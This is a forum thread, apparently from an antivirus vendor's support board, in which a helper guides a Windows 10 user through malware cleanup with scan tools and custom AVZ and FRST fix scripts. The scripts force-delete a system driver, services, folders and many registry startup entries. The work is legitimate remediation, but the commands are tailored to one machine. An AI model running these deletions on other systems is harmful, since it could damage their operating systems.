other sites
ajdebenedictis 0 Posted March 3, 2016 Author Report Share Posted March 3, 2016 Hi Kevin Zoll, I copied the text you provided in your last post created a Fixlist.txt file. I then re-ran the FRST64 program. I attached the Fixlog.txt file that was generated from the run. Please let me know what I need to do next. Thanks for your help. Albert DeBenedictis P.S. My computer seems to be working better now. Fixlog_02-03-2016_22-03-33.txt Link to post Share on other sites
Kevin Zoll 309 Posted March 3, 2016 Report Share Posted March 3, 2016 Let's take a fresh look. Run fresh scans with Emsisoft Emergency Kit (EEK) and FRST, attach the new EEK and FRST scans to your reply. Be sure to let me know how things are running? Link to post Share on other sites
ajdebenedictis 0 Posted March 3, 2016 Author Report Share Posted March 3, 2016 Hi Kevin Zoll, I just re-ran EEK (Emsisoft Emergency Kit) and FRST (Farbar Recovery Scan Tool) and attached the reports to this post. The scan_160303_151152.txt report was generated by the EEK program and the reports FRST.txt and Addition.txt were generated by the FRST program. My computer seems to be doing all right now, but I do not want to speak too soon. As you know, some malware, pop-ups, adware, etc., does not appear right away. Please let me know what you would like me to do next. Thanks again for all your help. Al P.S. Does Emsisoft have any spyware, malware, adware detection and removal programs that run constantly (similar to how Windows Defender works)? If so, would you please let me know how I may obtain it? If not, would you recommend some software I could install on my computer? I suppose I could run the EEK and FRST programs periodically, however, I would like to detect the spyware, malware, adware, before it does any harm to my computer. scan_160303-151152.txt FRST.txt Addition.txt Link to post Share on other sites
Kevin Zoll 309 Posted March 4, 2016 Report Share Posted March 4, 2016 The one driver is still present. Our software protects against the entire spectrum of malware threats. Download avz4.zip from here Unzip it to your desktop to a folder named avz4 Double click on AVZ.exe to run it. Run an update by clicking the Auto Update button on the Right of the Log window: Click Start to begin the update Note: If you receive an error message, chose a different source, then click Start again After the update, from the "File" menu, choose "Standard Scripts" Put a check next to item 2: Advanced System Analysis Click Execute selected scripts At the next prompt, click the OK button Let the scan run and click "OK" when the completion prompt pops up Now Close out of the Standard Scripts window, and exit AVZ Navigate to the avz4 folder and locate the folder LOG Inside the LOG folder you will find virusinfo_syscheck.htm, virusinfo_syscheck.htm and virusinfo_syscheck.zip Attach the Compressed file, virusinfo_syscheck.zip, to your next reply. Link to post Share on other sites
ajdebenedictis 0 Posted March 4, 2016 Author Report Share Posted March 4, 2016 Hi Kevin Zoll, Thanks for your reply. I downloaded the AVZ4 Antivirus Toolkit software and executed it. I attached the Virusinfo_syscheck.zip log to this post. Please review the log and let me know what I need to do next. Thanks, for all your help. Albert DeBenedictis virusinfo_syscheck.zip Link to post Share on other sites
Kevin Zoll 309 Posted March 7, 2016 Report Share Posted March 7, 2016 Close all windows then double click on AVZ.exe Click File > Custom scripts Copy & paste the below code in to the text box in the programNote: When you run the script, your PC will be restarted begin SetAVZGuardStatus(True); SearchRootkit(true, true); BC_DeleteFile('C:\WINDOWS\system32\drivers\bsdriver.sys'); BC_DeleteSvc('bsdriver'); ClearHostsFile; BC_Activate; ExecuteSysClean; RebootWindows(true); end. Click Run Restart your PC if it doesn't do it automatically. Attach a fresh AVZ log.Let me know of any problems you may have encountered with the above instructions and also let me know how things are running now! Link to post Share on other sites
ajdebenedictis 0 Posted March 8, 2016 Author Report Share Posted March 8, 2016 Hi Kevin Zoll, I executed the AVZ script you provided. When I ran the script through the AVZ program, errors were received. The execution did not generate a log so I removed the RebootWindows(true); line and re-executed the script to capture the log. I attached the errors to this post. Please let me know what you would like me to do next. Thanks. Albert DeBenedictis AVZ Execution results 03-07-2016.txt Link to post Share on other sites
Kevin Zoll 309 Posted March 8, 2016 Report Share Posted March 8, 2016 Close all windows then double click on AVZ.exe Click File > Custom scripts Copy & paste the below code in to the text box in the programNote: When you run the script, your PC will be restarted begin SearchRootkit(true, true); BC_DeleteFile('C:\WINDOWS\system32\drivers\bsdriver.sys'); BC_DeleteSvc('bsdriver'); ClearHostsFile; BC_Activate; ExecuteSysClean; RebootWindows(true); end. Click Run Restart your PC if it doesn't do it automatically. Attach a fresh AVZ log.Let me know of any problems you may have encountered with the above instructions and also let me know how things are running now! Link to post Share on other sites
ajdebenedictis 0 Posted March 8, 2016 Author Report Share Posted March 8, 2016 Hi Kevin Zoll, I ran AVZ program with the new script you gave me today (3/8/2016). The program did not generate a log file so I removed the RebootWindows(true); line from the script and re-executed the script to capture the log. It is attached to this post. The file, BSDriver.sys is still located in C:\Windows\System32\drivers Please let me know what you would like me to do next. I appreciate your help. So far, for the past few days I have not been experiencing any malware, adware, spyware, pop-up ads or any other kind of malicious software. Thanks, Albert DeBenedictis AVZ Execution results 03-08-2016.txt Link to post Share on other sites
Kevin Zoll 309 Posted March 9, 2016 Report Share Posted March 9, 2016 Run AdwCleaner and delete what it finds. Send the AdwCleaner cleanup log. Link to post Share on other sites
ajdebenedictis 0 Posted March 9, 2016 Author Report Share Posted March 9, 2016 Hi Kevin Zoll, I re-ran the AdwCleaner program that you mentioned in your last post. As you know, I originally ran this program back on 2/19/2016. I attached the log files (before AdwCleaner[s1,txt] and after AdwCleaner[C1].txt the Clean was executed). Please review the log files and let me know what you would like me to do next. I did not see any adware or malware programs appearing so far today on my infected computer. Thanks for your assistance. Al DeBenedictis AdwCleanerS1.txt AdwCleanerC1.txt Link to post Share on other sites
Kevin Zoll 309 Posted March 10, 2016 Report Share Posted March 10, 2016 AdwCleaner is showing that it deleted the driver. Let's take a fresh look. Run fresh scans with Emsisoft Emergency Kit (EEK) and FRST, attach the new EEK and FRST scans to your reply. Be sure to let me know how things are running? Link to post Share on other sites
ajdebenedictis 0 Posted March 11, 2016 Author Report Share Posted March 11, 2016 Hi Kevin Zoll, I ran the Emsisoft Emergency Kit (EEK) program. The report (scan_160310-211914.txt) that was generated from the execution is attached. I also ran the Farbar Recovery Scan Tool (FRST) program. I attached the reports (scan_160310-211914.txt & Addition_10-03-2016_21-38-42.txt) from the execution. As you can see from the reports, bsdriver.sys is still in C:\Windows\System32\drivers Please review the attached reports and let me know what you would like me to do next. I still have not experienced any malware or adware within the past few days. Thank you for your help. Al DeBenedictis scan_160310-211914.txt FRST_10-03-2016_21-38-42.txt Addition_10-03-2016_21-38-42.txt Link to post Share on other sites
Kevin Zoll 309 Posted March 11, 2016 Report Share Posted March 11, 2016 Copy the below code to Notepad; Save As fixlist.txt to your Desktop. HKU\S-1-5-21-32271450-1060499967-3261820355-1001\...\RunOnce: [Uninstall C:\Users\Albert\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Albert\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\amd64" HKU\S-1-5-21-32271450-1060499967-3261820355-1001\...\RunOnce: [Uninstall C:\Users\Albert\AppData\Local\Microsoft\OneDrive\17.3.6301.0127] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Albert\AppData\Local\Microsoft\OneDrive\17.3.6301.0127" R1 bsdriver; C:\WINDOWS\system32\drivers\bsdriver.sys [34712 2016-01-14] () S1 vdm0mji1; C:\WINDOWS\SysWOW64\Drivers\vdm0mji1.sys [13312 2016-03-08] () [File not signed] 2016-03-07 17:40 - 2016-03-08 16:15 - 00013312 _____ C:\WINDOWS\SysWOW64\Drivers\vdm0mji1.sys C:\WINDOWS\System32\Drivers\bsdriver.sysClose Notepad.NOTE: It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work. NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system Run FRST64 and press the Fix button just once and wait. If the tool needed a restart please make sure you let the system restart normally and let the tool complete its run after restart. The tool will make a log on the Desktop (Fixlog.txt). Attach it to your reply. Note: If the tool warns you about an outdated version please download and run the updated version. Link to post Share on other sites
ajdebenedictis 0 Posted March 12, 2016 Author Report Share Posted March 12, 2016 Hi Kevin Zoll, I re-ran the FRST64 (Farbar Recovery Scan Tool) with the script you provided. I attached the Fixlog.txt that was generated from the execution. Please let me know what you would like me to do next. Thanks, Al DeBenedictis Fixlog.txt Link to post Share on other sites
Kevin Zoll 309 Posted March 14, 2016 Report Share Posted March 14, 2016 Run a fresh scan with FRST and attach teh new FRST scan log to your reply. Link to post Share on other sites
ajdebenedictis 0 Posted March 14, 2016 Author Report Share Posted March 14, 2016 Hi Kevin Zoll, I re-ran FRST64, as you requested. I attached the FRST.txt and the Addition.txt reports that were generated from the execution. Please let me know what you would like me to do next. Thanks, Albert DeBenedictis FRST.txt Addition.txt Link to post Share on other sites
Kevin Zoll 309 Posted March 14, 2016 Report Share Posted March 14, 2016 The log shows that the driver was not removed. Run this FRST script from Safe Mode. Copy the below code to Notepad; Save As fixlist.txt to your Desktop. R1 bsdriver; C:\WINDOWS\system32\drivers\bsdriver.sys [34712 2016-01-14] () C:\WINDOWS\System32\Drivers\bsdriver.sysClose Notepad.NOTE: It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work. NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system Run FRST64 and press the Fix button just once and wait. If the tool needed a restart please make sure you let the system restart normally and let the tool complete its run after restart. The tool will make a log on the Desktop (Fixlog.txt). Attach it to your reply. Note: If the tool warns you about an outdated version please download and run the updated version. Link to post Share on other sites
ajdebenedictis 0 Posted March 15, 2016 Author Report Share Posted March 15, 2016 Hi Kevin Zoll, I re-ran FRST64.exe (in Safe mode) with the fixlist.txt script you gave me. I attached the fixlog.txt to this post. bsdriver.sys is still located in C:\Windows\System32\Drivers folder Would it be helpful if I sent the bsdriver.sys file to you? Pehaps you could figure out the owner and password associated with it so that it can be removed, although I suppose if you load bsdriver.sys on your computer, it might infect it. Please review the log attached and let me know what you would like me to do next. Thanks. Albert DeBenedictdis Fixlog.txt Link to post Share on other sites
Kevin Zoll 309 Posted March 16, 2016 Report Share Posted March 16, 2016 RUn a fresh scan with FRST, send me the new FRST log. Link to post Share on other sites
ajdebenedictis 0 Posted March 16, 2016 Author Report Share Posted March 16, 2016 Hi Kevin Zoll, I re-ran FRST64, as you requested. I attached the FRST.txt and Addition.txt files for you to review. Please let me know what you would like me to do next. Thanks, Albert DeBenedictis FRST.txt Addition.txt Link to post Share on other sites
Kevin Zoll 309 Posted March 17, 2016 Report Share Posted March 17, 2016 Copy the below code to Notepad; Save As fixlist.txt to your Desktop. CloseProcesses: EmptyTemp: cmd: net stop bsdriver cmd: sc delete bsdriver cmd: del /q /f "C:\WINDOWS\system32\drivers\bsdriver.sys" R1 bsdriver; C:\WINDOWS\system32\drivers\bsdriver.sys [34712 2016-01-14] () Reg: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder" /v "AllPCoptimizer.exe.lnk" /f Reg: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SpaceSoundPro" /f Reg: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "cpuminer" /f Reg: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32" /v "ospd_us_037010239" /f Reg: reg delete "HKU\S-1-5-21-32271450-1060499967-3261820355-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Only-search" /f Reg: reg delete "HKU\S-1-5-21-32271450-1060499967-3261820355-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Playthru Player" /f Reg: reg delete "HKU\S-1-5-21-32271450-1060499967-3261820355-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Selection Tools" /f Reg: reg delete "HKU\S-1-5-21-32271450-1060499967-3261820355-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "WindApp" /f Reg: reg delete "HKU\S-1-5-21-32271450-1060499967-3261820355-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer.\StartupApproved\Run" /v "Birds" /f Reg: reg delete "HKU\S-1-5-21-32271450-1060499967-3261820355-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer.\StartupApproved\Run" /v "NowUSeeIt Player" /f Reg: reg delete "HKU\S-1-5-21-32271450-1060499967-3261820355-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer.\StartupApproved\Run" /v "QuickyTranslator" /f Reg: reg delete "HKU\S-1-5-21-32271450-1060499967-3261820355-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer.\StartupApproved\Run" /v "Windi" /f Reg: reg delete "HKU\S-1-5-21-32271450-1060499967-3261820355-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer.\StartupApproved\Run" /v "Dynamation" /f Reg: reg delete "HKU\S-1-5-21-32271450-1060499967-3261820355-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer.\StartupApproved\Run" /v "Winoneexe" /f Reg: reg delete "HKU\S-1-5-21-32271450-1060499967-3261820355-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer.\StartupApproved\Run" /v "Itibiti.exe" /f C:\WINDOWS\system32\drivers\bsdriver.sys Reboot:Close Notepad.NOTE: It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work. NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system Run FRST64 and press the Fix button just once and wait. If the tool needed a restart please make sure you let the system restart normally and let the tool complete its run after restart. The tool will make a log on the Desktop (Fixlog.txt). Attach it to your reply. Note: If the tool warns you about an outdated version please download and run the updated version. Link to post Share on other sites
ajdebenedictis 0 Posted March 17, 2016 Author Report Share Posted March 17, 2016 Hi Kevin Zoll, I re-ran FRST64 with the script you provided and I attached the fixlog.txt to this post. Please let me know what you would like me to do next. Thanks, Albert DeBenedictis Fixlog.txt Link to post Share on other sites
Kevin Zoll 309 Posted March 18, 2016 Report Share Posted March 18, 2016 Run a fresh scan with FRST, attach the new FRST scan log to your reply. Link to post Share on other sites
ajdebenedictis 0 Posted March 18, 2016 Author Report Share Posted March 18, 2016 Hi Kevin Zoll, I re-ran the FRST64 program, as you requested and attached the FRST.txt and Addition.txt log files to this post. Please review the files and let me know what you want me to do next. Thanks, Albert DeBenedictis FRST.txt Addition.txt Link to post Share on other sites
Kevin Zoll 309 Posted March 21, 2016 Report Share Posted March 21, 2016 Your logs look fine. Unless you are having problems, it is time to do the final steps. Now to remove most of the tools that we have used in fixing your machine: Download Delfix from here and save it to your desktop. Ensure Remove disinfection tools is checked. Also place a checkmark next to:Create registry backup Purge system restore Click the Run button. When the tool is finished, a log will open in notepad. I do not need the log. You can close Notepad. Empty the Recycle Bin Download to your Desktop: - CCleaner Portable UnZip CCleaner Portable to a folder on your Desktop named CCleanerRun CCleanerOpen the CCleaner Folder on your Desktop and double-click CCleaner.exe (32-bit) or CCleaner64.exe (64-bit) Click "Options" and choose "Advanced" Uncheck "Only delete files in Windows Temp folders older than 24 hours" Then go back to "Cleaner" and click the "RunCleaner" button. Exit CCleaner. Turn off System restore to flush all your restore points then turn system restore back on. See How To Enable and Disable System Restore. You can delete and uninstall any programs I had you download, that you do not wish to keep on the system. Run and update your Windows Operating System. Articles to Read: How to Protect Your Computer From Malware How to keep you and your Windows PC happy Web, email, chat, password and kids safety 10 Sources of Malware Infections That should take care of everything. Safe Surfing! Link to post Share on other sites
ajdebenedictis 0 Posted March 21, 2016 Author Report Share Posted March 21, 2016 Hi Kevin Zoll, Thank you very much for all your help!!! I almost gave up on salvaging my computer. I really appreciate all the time and effort you applied to help me resolve the malmare that was on my computer. You mentioned in your last post that I should turn off my system restore before running cCleaner and then turn it back on again after cCleaner has completed. The link you provided for this does not say how to turn off/turn on system restore for Windows 10. The instructions only go up to Windows 7 and does not include any instructions for Windows 8, 9, or 10. I searched the internet to try to find information on how to turn off/turn on system restore for Windows 10, however, I have not been able to find adequate information. I checked a few utube videos, however, they are difficult to follow. Would you please provide a link that instructs how to turn off/turn on system restore for Windows 10? As I was doing my search, I became nervous when some pop-up ads appeared. I quickly closed them, however, I am now a little reluctant to do any searches on the internet, in fear of clicking on another malware. Thanks again for all your help. I really appreciate it. Albert DeBenedictis Link to post Share on other sites
Kevin Zoll 309 Posted March 22, 2016 Report Share Posted March 22, 2016 Albert, To mange System Restore in Win 8/8.1/10 got to Control Panel > System and Security > System > System Protection Link to post Share on other sites
ajdebenedictis 0 Posted March 22, 2016 Author Report Share Posted March 22, 2016 Hi Kevin Zoll, Thank you for the instructions your provided on how to turn on and turn off System Restore in Windows 10. I completed the instructions you sent me yesterday (3/21/2016) (including running DelFix and CCleaner), except I am not sure what you meant by "Run and update your Windows Operating System." I suppose this simply means to run the Windows operating system and periodically update the operating system as updates become available. If I need to do something else, please let me know. Thanks again for all your help. I greatly appreciate it. I will read the links you provided yesterday. I briefly glanced through some of them yesterday. They all appear to be very interesting and helpful, especially the anti-malware programs. Take care, Albert DeBenedictis Link to post Share on other sites
Kevin Zoll 309 Posted March 23, 2016 Report Share Posted March 23, 2016 Albert, All versions of Windows will allow you to run a manual check for Windows Updates. The main reason for having such an instruction to update the Windows Operating System, is that many people have turned off automatic updates in Windows and are running systems with unpatched versions of Windows. 1 Link to post Share on other sites
Recommended Posts